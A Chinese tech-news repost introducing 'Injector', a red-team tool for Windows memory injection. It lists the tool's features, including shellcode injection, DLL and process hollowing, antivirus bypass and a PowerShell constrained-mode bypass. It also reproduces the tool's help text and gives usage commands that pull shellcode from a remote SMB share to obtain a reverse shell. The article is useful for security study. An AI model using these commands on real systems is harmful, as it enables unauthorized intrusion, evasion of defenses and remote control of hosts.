如何使用Injector实现Windows下的内存注入

安全 网站安全
Injector是一款功能齐全且强大的内存注入工具,该工具集成了多种技术,可以帮助红队研究人员实现在Windows系统下的内存注入。

[[423411]]

关于Injector

Injector是一款功能齐全且强大的内存注入工具,该工具集成了多种技术,可以帮助红队研究人员实现在Windows系统下的内存注入。

Injector能做什么?

针对远程服务器和本地存储提供Shellcode注入支持。只需指定Shellcode文件,该工具将帮助我们完成后续的所有事情。默认情况下,工具会将Shellcode注入至exe,如果没有找到目标进程,它将会创建一个记事本进程,并注入其中实现持久化感染。

  • 支持反射DLL注入,工具将下载DLL并注入远程进程。
  • 通过exe实现进程镂空。
  • 使用-bypass参数,以支持使用更高级的、未记录的API来进行进程注入。
  • 支持加密的Shellcode,比如说AES加密或异或加密等。
  • 支持针对PowerShell的CLM绕过,可以直接将代码存防止能够执行C#代码的白名单文件夹中,比如说“C:\Windows\Tasks”。
  • 支持DLL镂空,通过dll实现。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

  1. git clone https://github.com/0xDivyanshu/Injector.git 

工具帮助

  1. C:\Users\admin>Injector.exe 
  2.  
  3. Help Options for Xenon: 
  4.  
  5. -m       Mode of operation 
  6.  
  7.         -m 1     Specifies the mode as Process injection 
  8.  
  9.         -m 2     Specifies the mode as Reflective DLL Injection 
  10.  
  11.         -m 3     Specifies the mode as Process Hollowing 
  12.  
  13.         -m 4     No injection! Give me my damn shell 
  14.  
  15.         -m 5     Powershell session via CLM bypass 
  16.  
  17.         -m 6     DLL hollowing 
  18.  
  19.   
  20.  
  21. -TempFile        File location that your current user can read 
  22.  
  23. -shellcode       Use shellcode 
  24.  
  25. -dll     Use dll 
  26.  
  27. -decrypt-xor     Specify Xor decryption for shellcode 
  28.  
  29.          -pass   Specifty the password for Xor decryption 
  30.  
  31. -decrypt-aes     Specify aes decryption for shellcode 
  32.  
  33.          -pass   Specifty the password for aes decryption 
  34.  
  35. -location        Specify the location i.e either server or local 
  36.  
  37. -bypass         Uses enhance attempts to bypass AV 

如需生成加密的Shellcode,请在Kali下使用Helper.exe。

工具使用样例

  1. Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\\192.x.x.x\share\shellcode.txt" -bypass 

上述命令将解密你的Shellcode并给你一个反向Shell。

如果你不想使用加密的Shellcode,你也可以直接使用下列命令运行下列命令:

  1. Injector.exe -m=1 -shellcode -location="\\192.x.x.x\share\shellcode.txt" 

将其中的“-m=1”修改为“2,3,4,6”之后,就可以运行其他模式了:

  1. Injector.exe -m=5 -TempFile=C:\\Users\\user\\sample.txt 

上述命令将提供要给会话,我们可以使用它来执行IEX cradle,并获取一个能够绕过CLM的反向Shell。

PowerShell

你还可以使用Invoke-Exe.ps1来通过PowerShel执行Injector:

  1. Invoke-Exe -loc C:\Users\john\injector.exe 

项目地址

Injector:【GitHub传送门

 

责任编辑:赵宁宁 来源: FreeBuf
相关推荐

2021-09-13 18:09:35

cThreadHija远程进程注入网络攻击

2021-07-28 09:53:53

FalconEye注入安全检测

2017-08-16 16:00:05

PHPcontainer依赖注入

2010-04-08 15:37:33

2010-06-04 14:12:57

Hadoop开发环境

2009-09-09 13:47:38

C++访问SqlCe

2014-03-04 09:53:29

Redis存储系统

2020-11-25 08:41:56

Windows

2010-09-27 15:03:34

TomcatJVM内存设置

2018-07-24 09:57:02

2017-04-13 13:00:27

LinuxWindowstomcat

2009-04-11 15:12:24

Windows CE串行通信GPS

2010-05-26 15:07:36

SVN版本库自动备份

2022-09-01 13:12:53

LinuxTC网络限流

2011-09-05 14:17:07

UbuntuWindows键

2011-08-08 16:49:07

自动关机SwitchOffWindows

2018-03-12 10:02:30

PHP依赖注入

2018-12-07 11:15:20

设置Windows 10命令

2012-09-28 13:39:40

Windows备份

2010-06-07 09:47:34

php sendmai
点赞
收藏

51CTO技术栈公众号